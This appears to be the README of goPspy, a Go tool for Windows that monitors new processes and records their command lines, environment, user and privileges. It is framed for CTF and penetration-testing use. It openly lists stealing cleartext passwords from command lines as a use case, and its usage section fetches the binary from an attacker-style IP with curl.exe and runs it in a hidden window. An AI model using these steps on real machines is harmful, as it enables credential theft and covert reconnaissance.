######
goPspy
######

*****
Intro
*****

| Same concept as pspy but for windows, using Golang.
|
| Use cases

* You want to detect any recurring/planned activity on machine (usefull for bots into CTFs challenges)
* You want to steal clear passwords from cmdline
* You want to check for (unwanted) privileges

|
| Similar projects :

* https://github.com/xct/winpspy (include files monitoring as well)

|

| Retrieved infos when you have rights on process

* PROCESS_QUERY_INFORMATION|windows.PROCESS_VM_READ
    * cmdline
    * workdir
    * environment
    * user
    * session
    * privileges
    * restricted
    * elevated (UAC status)
    * integrity level
    * pid
    * exepath
* PROCESS_QUERY_INFORMATION
    * user
    * session
    * privileges
    * restricted
    * elevated (UAC status)
    * integrity level
    * pid
    * exepath
* PROCESS_QUERY_LIMITED_INFORMATION
    * pid
    * exepath

|

| Retrieved infos if unable to open any handle

* pid
* exename

|

*****
Build
*****

| crosscompile

.. code-block:: bash

    sudo docker build -t gobuilder:latest .
    sudo bash dockerbuild.sh
    sudo cp bin/gopspy.exe /var/www/html/
    sudo cp bin/gopspy32.exe /var/www/html/
    sudo chmod 644 /var/www/html/gopspy*.exe

|

*****
Usage
*****

.. code-block:: bash

    curl.exe http://10.10.14.121/gopspy.exe -o gopspy.exe
    Start-Process -NoNewWindow -FilePath "C:\Users\user\Desktop\gopspy.exe"
    Start-Process -NoNewWindow -FilePath "C:\Users\user\Desktop\gopspy.exe" -ArgumentList "getenv"
    # wget http://10.10.14.121/gopspy.exe -O gopspy.exe
    
.. code-block:: bash

    Stop-Process -Name "gopspy"
    taskkill /F /IM gopspy.exe
    
|


******
Output
******

.. code-block::

    --------------------------------------------------
    PID: 5856
    PATH: C:\Windows\System32\conhost.exe
    CMDLINE: \??\C:\Windows\system32\conhost.exe 0x4
    USER: w11\user
    ELEVATED (UAC): false
    RESTRICTED: false
    INTEGRITY: medium
    PRIVILEGES:
    - SeShutdownPrivilege: false
    - SeChangeNotifyPrivilege: true
    - SeUndockPrivilege: false
    - SeIncreaseWorkingSetPrivilege: false
    - SeTimeZonePrivilege: false
    SESSION: 1
    PARENTS: 10528 firefox.exe > 3980 pingsender.exe > 4412 conhost.exe > 5856

    --------------------------------------------------
    PID: 11936
    EXE: svchost.exe
    PARENTS: 676 wininit.exe > 764 services.exe > 848 svchost.exe > 11936

    --------------------------------------------------
    PID: 11936
    PARENTS: 676 wininit.exe > 764 services.exe > 848 svchost.exe > 11936

    --------------------------------------------------
    PID: 5244
    EXE: wermgr.exe
    PARENTS: 676 wininit.exe > 764 services.exe > 848 svchost.exe > 1700 wermgr.exe > 5244

    --------------------------------------------------
    PID: 5244
    PARENTS: 676 wininit.exe > 764 services.exe > 848 svchost.exe > 1700 wermgr.exe > 5244

    --------------------------------------------------
    PID: 7292
    PATH: C:\Windows\System32\whoami.exe
    CMDLINE: "C:\Windows\system32\whoami.exe"
    USER: w11\user
    ELEVATED (UAC): false
    RESTRICTED: false
    INTEGRITY: medium
    PRIVILEGES:
    - SeShutdownPrivilege: false
    - SeChangeNotifyPrivilege: true
    - SeUndockPrivilege: false
    - SeIncreaseWorkingSetPrivilege: false
    - SeTimeZonePrivilege: false
    SESSION: 1
    PARENTS: 5360 explorer.exe > 5400 powershell.exe > 10608 whoami.exe > 7292

|
